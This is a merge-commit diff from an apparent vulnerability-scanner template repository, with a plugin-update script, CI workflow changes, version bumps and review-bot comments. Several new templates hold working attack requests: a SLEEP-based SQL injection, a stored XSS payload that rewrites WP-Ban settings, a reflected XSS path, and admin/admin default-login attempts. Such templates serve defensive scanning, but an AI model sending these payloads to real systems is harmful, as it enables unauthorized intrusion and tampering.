Merge branch 'projectdiscovery:main' into pgsql_detect

patch-1
nybble04 2022-12-29 18:48:10 +04:00 committed by GitHub
commit a9c2622572
253 changed files with 588 additions and 729 deletions


@ -19,6 +19,7 @@ from bs4 import BeautifulSoup
import requests
import re
from markdown import markdown
import os
from termcolor import colored, cprint
# Regex to extract the name of th plugin from the URL
@ -123,8 +124,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
@ -159,14 +159,25 @@ requests:
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
'''
version_file = open(
f"helpers/wordpress/plugins/{name}.txt", "w")
work_dir = os.getcwd()
print(f"Current working directory: {work_dir}")
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
template_dir = f"{work_dir}/technologies/wordpress/plugins"
if not os.path.exists(helper_dir):
os.makedirs(helper_dir)
if not os.path.exists(template_dir):
os.makedirs(template_dir)
helper_path = f"helpers/wordpress/plugins/{name}.txt"
version_file = open(helper_path, "w")
version_file.write(version)
version_file.close()
# print(template)
template_file = open(
f"technologies/wordpress/plugins/{name}.yaml", "w")
template_path = f"technologies/wordpress/plugins/{name}.yaml"
template_file = open(template_path, "w") # Dev environment
template_file.write(template)
template_file.close()
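Review bot: `name`, which the comment at the top of the hunk says is pulled out of a URL by regex, reaches `helper_path` and `template_path` without any validation, so a value containing `/` or `..` would make `open(..., "w")` write outside the two plugins directories — and the workflow hunk below then stages everything with `git add --all`. Reject anything that is not a plain slug before the first `open`, e.g. `if not re.fullmatch(r"[A-Za-z0-9_-]+", name): raise ValueError(f"unexpected plugin name: {name!r}")` (`re` is already imported in the first hunk). The `exists`/`makedirs` pairs reduce to `os.makedirs(helper_dir, exist_ok=True)`, and both writes are safer as `with open(path, "w") as f:` so a failed `write` does not leave a handle open. The `# Dev environment` trailer on the second `open` and the commented-out `# print(template)` above it say nothing to the next reader and can go. The enclosing function starts before this hunk.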


@ -7,9 +7,6 @@ jobs:
Update:
runs-on: ubuntu-latest
steps:
- name: Install tree
run: sudo apt-get install tree -y
- name: Check out repository code
uses: actions/checkout@v3
with:
@ -25,20 +22,22 @@ jobs:
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
- name: Update Templates
id: update-templates
run: |
python3 .github/scripts/wordpress-plugins-update.py
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.readme-update.outputs.CHANGES > 0
if: steps.update-templates.outputs.CHANGES > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:" -a
git add --all
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
- name: Push changes
if: steps.readme-update.outputs.CHANGES > 0
if: steps.update-templates.outputs.CHANGES > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.TOKEN }}
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
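Review bot: The push step this hunk retargets to `secrets.GITHUB_TOKEN` still runs `ad-m/github-push-action@master`, a third-party action at a mutable branch ref, so whatever lands on that branch later executes with write access to this repository's token. Pin it to a full commit SHA, `uses: ad-m/github-push-action@<full-commit-sha> # vX.Y.Z`, which is stricter than the tag pin already used for `actions/checkout@v3`. Because `git add --all` stages every file the script produced, anything the script writes — including a mis-pathed file from an unvalidated plugin name — is committed unreviewed, which is why the input check in the script hunk matters here too.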


@ -1,230 +0,0 @@
cves/2021/CVE-2021-30128.yaml
cves/2021/CVE-2021-42887.yaml
cves/2022/CVE-2022-0786.yaml
cves/2022/CVE-2022-25082.yaml
cves/2022/CVE-2022-33891.yaml
cves/2022/CVE-2022-45362.yaml
default-logins/mobotix/mobotix-default-login.yaml
default-logins/tiny-file-manager-default-login.yaml
exposed-panels/content-central-login.yaml
exposed-panels/creatio-login-panel.yaml
exposed-panels/loxone-panel.yaml
exposed-panels/ncentral-panel.yaml
exposed-panels/posthog-admin-panel.yaml
exposed-panels/webuzo-admin-panel.yaml
exposed-panels/xfinity-panel.yaml
exposures/logs/ws-ftp-log.yaml
exposures/tokens/zenserp/zenscrape-api-key.yaml
exposures/tokens/zenserp/zenserp-api-key.yaml
exposures/tokens/zeplin/zeplin-access-token.yaml
exposures/tokens/zerobounce/zerobounce-api-token.yaml
iot/carel-plantvisor-panel.yaml
iot/hue-personal-wireless-panel.yaml
miscellaneous/gpc-json.yaml
misconfiguration/sony-bravia-disclosure.yaml
network/exposed-dockerd.yaml
technologies/akamai-cache-detect.yaml
technologies/aws/amazon-ec2-detect.yaml
technologies/wordpress/plugins/ad-inserter.yaml
technologies/wordpress/plugins/add-to-any.yaml
technologies/wordpress/plugins/admin-menu-editor.yaml
technologies/wordpress/plugins/adminimize.yaml
technologies/wordpress/plugins/advanced-custom-fields.yaml
technologies/wordpress/plugins/akismet.yaml
technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
technologies/wordpress/plugins/all-in-one-seo-pack.yaml
technologies/wordpress/plugins/all-in-one-wp-migration.yaml
technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
technologies/wordpress/plugins/amp.yaml
technologies/wordpress/plugins/antispam-bee.yaml
technologies/wordpress/plugins/astra-sites.yaml
technologies/wordpress/plugins/astra-widgets.yaml
technologies/wordpress/plugins/autoptimize.yaml
technologies/wordpress/plugins/backwpup.yaml
technologies/wordpress/plugins/better-search-replace.yaml
technologies/wordpress/plugins/better-wp-security.yaml
technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
technologies/wordpress/plugins/breadcrumb-navxt.yaml
technologies/wordpress/plugins/broken-link-checker.yaml
technologies/wordpress/plugins/child-theme-configurator.yaml
technologies/wordpress/plugins/classic-editor.yaml
technologies/wordpress/plugins/classic-widgets.yaml
technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
technologies/wordpress/plugins/cloudflare.yaml
technologies/wordpress/plugins/cmb2.yaml
technologies/wordpress/plugins/coblocks.yaml
technologies/wordpress/plugins/code-snippets.yaml
technologies/wordpress/plugins/coming-soon.yaml
technologies/wordpress/plugins/complianz-gdpr.yaml
technologies/wordpress/plugins/contact-form-7-honeypot.yaml
technologies/wordpress/plugins/contact-form-7.yaml
technologies/wordpress/plugins/contact-form-cfdb7.yaml
technologies/wordpress/plugins/cookie-law-info.yaml
technologies/wordpress/plugins/cookie-notice.yaml
technologies/wordpress/plugins/creame-whatsapp-me.yaml
technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
technologies/wordpress/plugins/custom-css-js.yaml
technologies/wordpress/plugins/custom-fonts.yaml
technologies/wordpress/plugins/custom-post-type-ui.yaml
technologies/wordpress/plugins/disable-comments.yaml
technologies/wordpress/plugins/disable-gutenberg.yaml
technologies/wordpress/plugins/duplicate-page.yaml
technologies/wordpress/plugins/duplicate-post.yaml
technologies/wordpress/plugins/duplicator.yaml
technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
technologies/wordpress/plugins/easy-fancybox.yaml
technologies/wordpress/plugins/easy-google-fonts.yaml
technologies/wordpress/plugins/easy-table-of-contents.yaml
technologies/wordpress/plugins/easy-wp-smtp.yaml
technologies/wordpress/plugins/elementor.yaml
technologies/wordpress/plugins/elementskit-lite.yaml
technologies/wordpress/plugins/enable-media-replace.yaml
technologies/wordpress/plugins/envato-elements.yaml
technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
technologies/wordpress/plugins/ewww-image-optimizer.yaml
technologies/wordpress/plugins/facebook-for-woocommerce.yaml
technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
technologies/wordpress/plugins/flamingo.yaml
technologies/wordpress/plugins/fluentform.yaml
technologies/wordpress/plugins/font-awesome.yaml
technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
technologies/wordpress/plugins/formidable.yaml
technologies/wordpress/plugins/forminator.yaml
technologies/wordpress/plugins/ga-google-analytics.yaml
technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
technologies/wordpress/plugins/google-listings-and-ads.yaml
technologies/wordpress/plugins/google-site-kit.yaml
technologies/wordpress/plugins/google-sitemap-generator.yaml
technologies/wordpress/plugins/gtranslate.yaml
technologies/wordpress/plugins/gutenberg.yaml
technologies/wordpress/plugins/happy-elementor-addons.yaml
technologies/wordpress/plugins/header-and-footer-scripts.yaml
technologies/wordpress/plugins/header-footer-code-manager.yaml
technologies/wordpress/plugins/header-footer-elementor.yaml
technologies/wordpress/plugins/header-footer.yaml
technologies/wordpress/plugins/health-check.yaml
technologies/wordpress/plugins/hello-dolly.yaml
technologies/wordpress/plugins/imagify.yaml
technologies/wordpress/plugins/imsanity.yaml
technologies/wordpress/plugins/insert-headers-and-footers.yaml
technologies/wordpress/plugins/instagram-feed.yaml
technologies/wordpress/plugins/intuitive-custom-post-order.yaml
technologies/wordpress/plugins/iwp-client.yaml
technologies/wordpress/plugins/jetpack.yaml
technologies/wordpress/plugins/kadence-blocks.yaml
technologies/wordpress/plugins/kirki.yaml
technologies/wordpress/plugins/leadin.yaml
technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
technologies/wordpress/plugins/limit-login-attempts.yaml
technologies/wordpress/plugins/litespeed-cache.yaml
technologies/wordpress/plugins/loco-translate.yaml
technologies/wordpress/plugins/loginizer.yaml
technologies/wordpress/plugins/loginpress.yaml
technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
technologies/wordpress/plugins/mailchimp-for-wp.yaml
technologies/wordpress/plugins/mailpoet.yaml
technologies/wordpress/plugins/maintenance.yaml
technologies/wordpress/plugins/mainwp-child.yaml
technologies/wordpress/plugins/malcare-security.yaml
technologies/wordpress/plugins/megamenu.yaml
technologies/wordpress/plugins/members.yaml
technologies/wordpress/plugins/meta-box.yaml
technologies/wordpress/plugins/ml-slider.yaml
technologies/wordpress/plugins/newsletter.yaml
technologies/wordpress/plugins/nextend-facebook-connect.yaml
technologies/wordpress/plugins/nextgen-gallery.yaml
technologies/wordpress/plugins/ninja-forms.yaml
technologies/wordpress/plugins/ocean-extra.yaml
technologies/wordpress/plugins/official-facebook-pixel.yaml
technologies/wordpress/plugins/one-click-demo-import.yaml
technologies/wordpress/plugins/optinmonster.yaml
technologies/wordpress/plugins/password-protected.yaml
technologies/wordpress/plugins/pdf-embedder.yaml
technologies/wordpress/plugins/photo-gallery.yaml
technologies/wordpress/plugins/php-compatibility-checker.yaml
technologies/wordpress/plugins/pixelyoursite.yaml
technologies/wordpress/plugins/polylang.yaml
technologies/wordpress/plugins/popup-builder.yaml
technologies/wordpress/plugins/popup-maker.yaml
technologies/wordpress/plugins/post-smtp.yaml
technologies/wordpress/plugins/post-types-order.yaml
technologies/wordpress/plugins/premium-addons-for-elementor.yaml
technologies/wordpress/plugins/pretty-link.yaml
technologies/wordpress/plugins/really-simple-captcha.yaml
technologies/wordpress/plugins/really-simple-ssl.yaml
technologies/wordpress/plugins/redirection.yaml
technologies/wordpress/plugins/redux-framework.yaml
technologies/wordpress/plugins/regenerate-thumbnails.yaml
technologies/wordpress/plugins/safe-svg.yaml
technologies/wordpress/plugins/seo-by-rank-math.yaml
technologies/wordpress/plugins/sg-cachepress.yaml
technologies/wordpress/plugins/sg-security.yaml
technologies/wordpress/plugins/shortcodes-ultimate.yaml
technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
technologies/wordpress/plugins/simple-custom-post-order.yaml
technologies/wordpress/plugins/simple-page-ordering.yaml
technologies/wordpress/plugins/siteguard.yaml
technologies/wordpress/plugins/siteorigin-panels.yaml
technologies/wordpress/plugins/smart-slider-3.yaml
technologies/wordpress/plugins/so-widgets-bundle.yaml
technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml
technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
technologies/wordpress/plugins/sucuri-scanner.yaml
technologies/wordpress/plugins/svg-support.yaml
technologies/wordpress/plugins/table-of-contents-plus.yaml
technologies/wordpress/plugins/tablepress.yaml
technologies/wordpress/plugins/taxonomy-terms-order.yaml
technologies/wordpress/plugins/the-events-calendar.yaml
technologies/wordpress/plugins/themeisle-companion.yaml
technologies/wordpress/plugins/tinymce-advanced.yaml
technologies/wordpress/plugins/translatepress-multilingual.yaml
technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
technologies/wordpress/plugins/under-construction-page.yaml
technologies/wordpress/plugins/unyson.yaml
technologies/wordpress/plugins/updraftplus.yaml
technologies/wordpress/plugins/use-any-font.yaml
technologies/wordpress/plugins/user-role-editor.yaml
technologies/wordpress/plugins/velvet-blues-update-urls.yaml
technologies/wordpress/plugins/w3-total-cache.yaml
technologies/wordpress/plugins/webp-converter-for-media.yaml
technologies/wordpress/plugins/widget-importer-exporter.yaml
technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
technologies/wordpress/plugins/woo-variation-swatches.yaml
technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
technologies/wordpress/plugins/woocommerce-payments.yaml
technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
technologies/wordpress/plugins/woocommerce-services.yaml
technologies/wordpress/plugins/woocommerce.yaml
technologies/wordpress/plugins/woosidebars.yaml
technologies/wordpress/plugins/wordfence.yaml
technologies/wordpress/plugins/wordpress-importer.yaml
technologies/wordpress/plugins/wordpress-seo.yaml
technologies/wordpress/plugins/worker.yaml
technologies/wordpress/plugins/wp-fastest-cache.yaml
technologies/wordpress/plugins/wp-file-manager.yaml
technologies/wordpress/plugins/wp-google-maps.yaml
technologies/wordpress/plugins/wp-mail-smtp.yaml
technologies/wordpress/plugins/wp-maintenance-mode.yaml
technologies/wordpress/plugins/wp-migrate-db.yaml
technologies/wordpress/plugins/wp-multibyte-patch.yaml
technologies/wordpress/plugins/wp-optimize.yaml
technologies/wordpress/plugins/wp-pagenavi.yaml
technologies/wordpress/plugins/wp-reset.yaml
technologies/wordpress/plugins/wp-sitemap-page.yaml
technologies/wordpress/plugins/wp-smushit.yaml
technologies/wordpress/plugins/wp-statistics.yaml
technologies/wordpress/plugins/wp-super-cache.yaml
technologies/wordpress/plugins/wp-user-avatar.yaml
technologies/wordpress/plugins/wpcf7-recaptcha.yaml
technologies/wordpress/plugins/wpcf7-redirect.yaml
technologies/wordpress/plugins/wpforms-lite.yaml
technologies/wordpress/plugins/wps-hide-login.yaml
technologies/wordpress/plugins/yith-woocommerce-compare.yaml
technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
vulnerabilities/amazon/amazon-ec2-ssrf.yaml
vulnerabilities/other/digital-ocean-ssrf.yaml
vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml


@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
**328 directories, 4791 files**.
**335 directories, 5229 files**.
</td>
</tr>


@ -4,10 +4,11 @@ info:
name: OpenTSDB <= 2.4.0 - Remote Code Execution
author: pikpikcu
severity: critical
description: "OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory."
description: OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
reference:
- https://github.com/OpenTSDB/opentsdb/issues/2051
- https://nvd.nist.gov/vuln/detail/CVE-2020-35476
- http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8


@ -10,11 +10,12 @@ info:
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
classification:
cve-id: CVE-2022-23854
metadata:
verified: true
shodan-query: http.html:"InTouch Access Anywhere"
verified: "true"
tags: lfi,packetstorm,cve,cve2022,aveva,intouch
requests:
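Review bot: `verified: true` becomes the string `"true"` at the end of this hunk, but the templates added by the same commit use both forms — the quoted string in CVE-2022-3768, CVE-2022-4260, CVE-2022-46381 and xui-weak-login, the bare boolean in kanboard-default-login, atlantis-detect and kanboard-login. Tooling that filters on `metadata.verified` will see two types; pick one form and apply it across all of these files rather than only here.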


@ -0,0 +1,47 @@
id: CVE-2022-3768
info:
name: WPSmartContracts < 1.3.12 - Author SQLi
author: Hardik-Solanki
severity: high
description: |
The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author
remediation: Fixed in version 1.3.12
reference:
- https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768
- https://nvd.nist.gov/vuln/detail/CVE-2022-3768
- https://cve.report/CVE-2022-3768
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-3768
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-smart-contracts,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_2>=5'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "Batch Mint NFTs")'
condition: and


@ -0,0 +1,66 @@
id: CVE-2022-4260
info:
name: WP-Ban < 1.69.1 - Admin Stored XSS
author: Hardik-Solanki
severity: high
description: |
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
remediation: Fixed in version 1.69.1
reference:
- https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260
- https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk
classification:
cve-id: CVE-2022-4260
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
Host: {{Hostname}}
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes
- |
GET / HTTP/1.1
Host: {{Hostname}}
Referer: XSS
host-redirects: true
max-redirects: 2
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_4, "<script>alert(document.domain);</script>")'
- 'contains(content_type_4, "text/html")'
- 'status_code_4 == 200'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '_wpnonce=([0-9a-z]+)'
internal: true
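Review bot: The third request persistently rewrites the target's WP-Ban settings (`banned_referers=XSS`, `banned_template_message=<script>…`) and nothing in the template restores them, so a successful run leaves the site with a changed ban list and ban page. A template that modifies target state should carry the `intrusive` tag so operators can exclude it with `-etags intrusive`, and the `description` should say in one sentence that the plugin settings are overwritten and not reverted. The `_wpnonce=([0-9a-z]+)` extractor is applied to every response; if the homepage fetched by the second request does not expose a nonce for a logged-in user, the POST goes out with an empty `{{nonce}}` — worth confirming which response it is meant to match.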


@ -0,0 +1,32 @@
id: CVE-2022-46381
info:
name: Certain Linear eMerge E3-Series - Cross Site Scripting
author: arafatansari
severity: medium
description: |
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381
- https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt
metadata:
verified: "true"
shodan-query: http.html:"Linear eMerge"
tags: cve,cve2022,xss,emerge,linear
requests:
- method: GET
path:
- '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type="/><svg/onload="alert(document.domain)"/>'
matchers-condition: and
matchers:
- type: word
words:
- '<svg/onload="alert(document.domain)"/>'
- 'Badging Template'
condition: and
- type: status
status:
- 200
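Review bot: Unlike CVE-2022-4260 in the same commit, this template carries no `classification` block, so the CVE id and weakness are not queryable from the template metadata; adding `classification:` with `cve-id: CVE-2022-46381` and `cwe-id: CWE-79` keeps the CVE templates uniform. The rest of the info block (`shodan-query`, `verified`, references) is complete.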


@ -0,0 +1,60 @@
id: kanboard-default-login
info:
name: Kanboard Default Login
author: shelled
severity: high
description: Kanboard default login was discovered.
reference:
- https://twitter.com/0x_rood/status/1607068644634157059
- https://github.com/kanboard/kanboard
- https://docs.kanboard.org/v1/admin/installation/
metadata:
verified: true
shodan-query: http.favicon.hash:2056442365
tags: default-login,kanboard
requests:
- raw:
- |
GET /?controller=AuthController&action=login HTTP/1.1
Host: {{Hostname}}
- |
POST /?controller=AuthController&action=check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}&csrf_token={{csrf_token}}
- |
GET /?controller=DashboardController&action=show HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
user:
- admin
pass:
- admin
extractors:
- type: regex
name: csrf_token
part: body
internal: true
group: 1
regex:
- "hidden\" name=\"csrf_token\" value=\"([0-9a-z]+)\""
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- 'New project'
- 'Project management'
condition: and
case-insensitive: true
- type: status
status:
- 200
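Review bot: The word matchers are not bound to a particular response in the three-request chain, so if they are evaluated against each response in turn, a hit on `Project management` in the login page or the post-login redirect would report a default login before the dashboard was ever fetched. Binding the check to the dashboard response makes the result depend only on the authenticated page, e.g. `req-condition: true` with a dsl matcher `status_code_3 == 200 && contains(body_3, "New project")`, the pattern CVE-2022-4260 in this commit already uses. The `csrf_token` extractor is marked `internal: true` and `group: 1`, which is the right shape for feeding the second request.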


@ -0,0 +1,48 @@
id: xui-weak-login
info:
name: X-UI Login Default Login
author: dali
severity: high
description: |
X-UI Default Login Credentials.
reference:
- https://github.com/vaxilu/x-ui
- https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20.
classification:
cwe-id: CWE-798
metadata:
verified: "true"
shodan-query: title:"X-UI Login"
tags: x-ui,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/login"
headers:
content-type: application/x-www-form-urlencoded
body: "username={{username}}&password={{password}}"
attack: pitchfork
payloads:
username:
- "admin"
password:
- "admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":true'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
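Review bot: `name: X-UI Login Default Login` repeats "Login"; `name: X-UI Default Login` reads correctly and matches the `default-login` tag. The `id` `xui-weak-login` also departs from the `<product>-default-login` pattern that kanboard-default-login follows in the same commit, so `xui-default-login` (with the file renamed to match) would keep ids and tags searchable together.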


@ -0,0 +1,30 @@
id: atlantis-detect
info:
name: Atlantis Detect
author: jonathanwalker
severity: info
reference:
- https://github.com/runatlantis/atlantis
metadata:
verified: true
shodan-query: http.favicon.hash:-1706783005
tags: panel,atlantis
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'title="atlantis'
- 'Lock'
condition: and
- type: status
status:
- 200
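Review bot: The `info` block has no `description`, unlike kanboard-login in the same commit, so a finding carries only the name `Atlantis Detect`; adding `description: An Atlantis panel was detected.` in the same one-line style as `A Kanboard login panel was detected.` gives consumers of the output something concrete. The word `'Lock'` is generic on its own, but `condition: and` together with `title="atlantis` keeps it from matching alone, so that part is fine as written.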


@ -0,0 +1,30 @@
id: kanboard-login
info:
name: Kanboard Login Panel
author: DhiyaneshDK
severity: info
description: A Kanboard login panel was detected.
classification:
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.favicon.hash:2056442365
tags: panel,kanboard
requests:
- method: GET
path:
- '{{BaseURL}}'
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- '/?controller=UserAjaxController&amp;action=status'
- type: status
status:
- 200


@ -1,20 +0,0 @@
id: zeplin-access-token
info:
name: Zeplin Access Token
author: ritikchaddha
severity: info
reference:
- https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zeplin/zeplin.go
- https://app.zeplin.io/profile/developer
tags: exposure,token,zeplin
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '([a-zA-Z0-9-.]{350,400})'


@ -1,21 +0,0 @@
id: zerobounce-api-token
info:
name: Zerobounce API Token
author: ritikchaddha
severity: info
reference:
- https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zerobounce/zerobounce.go
- https://www.zerobounce.net/docs/email-validation-api-quickstart
tags: exposure,token,zerobounce,api
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '([a-z0-9]{32})'


@ -1 +1 @@
2.7.22
2.7.23


@ -1 +1 @@
7.68
7.69


@ -1 +1 @@
3.1.20
3.1.21


@ -1 +1 @@
2.25.4
2.25.5


@ -1 +1 @@
6.3.6.1
6.3.9


@ -1 +1 @@
5.7.1
5.7.2


@ -1 +1 @@
1.13.3
1.13.4


@ -1 +1 @@
4.4.9
4.5


@ -1 +1 @@
1.5.2
1.5.3


@ -1 +1 @@
3.9.1
3.9.2


@ -1 +1 @@
4.3.1
4.3.2


@ -1 +1 @@
1.21.0
1.22.1


@ -1 +1 @@
2.3.3
2.3.5


@ -1 +1 @@
1.89.0
1.90.1


@ -1 +1 @@
14.7.3
14.8.3


@ -1 +1 @@
9.2.12
9.2.81


@ -1 +1 @@
4.2.0
4.3.0


@ -1 +1 @@
5.6.14
5.6.15


@ -1 +1 @@
3.28.0
3.28.2


@ -1 +1 @@
1.8.5
1.8.8


@ -1 +1 @@
2.2.1
2.2.3


@ -1 +1 @@
4.9.44
4.9.45


@ -1 +1 @@
6.0.12
6.0.14


@ -1 +1 @@
1.0.103.1
1.0.105


@ -1 +1 @@
1.45.0
1.46.0


@ -1 +1 @@
1.14
2.0.1


@ -1 +1 @@
2.4.3
2.4.4


@ -1 +1 @@
5.5.1
5.6.1


@ -1 +1 @@
5.1.2
5.2.0


@ -1 +1 @@
7.2.0
7.2.2


@ -1 +1 @@
19.12
19.13


@ -1 +1 @@
13.2.8
13.2.10


@ -1 +1 @@
4.4.1
4.5.1


@ -2,7 +2,7 @@ id: exposed-dockerd
info:
name: Docker Daemon Exposed
author: arafat
author: arafatansari
severity: critical
description: |
Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.


@ -2640,3 +2640,8 @@ requests:
name: "Leica RefWorx"
dsl:
- "status_code==200 && (\"-1054477011\" == mmh3(base64_py(body)))"
- type: dsl
name: "Liferay"
dsl:
- "status_code==200 && (\"-2024949122\" == mmh3(base64_py(body)))"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/adminimize/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/akismet/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt"


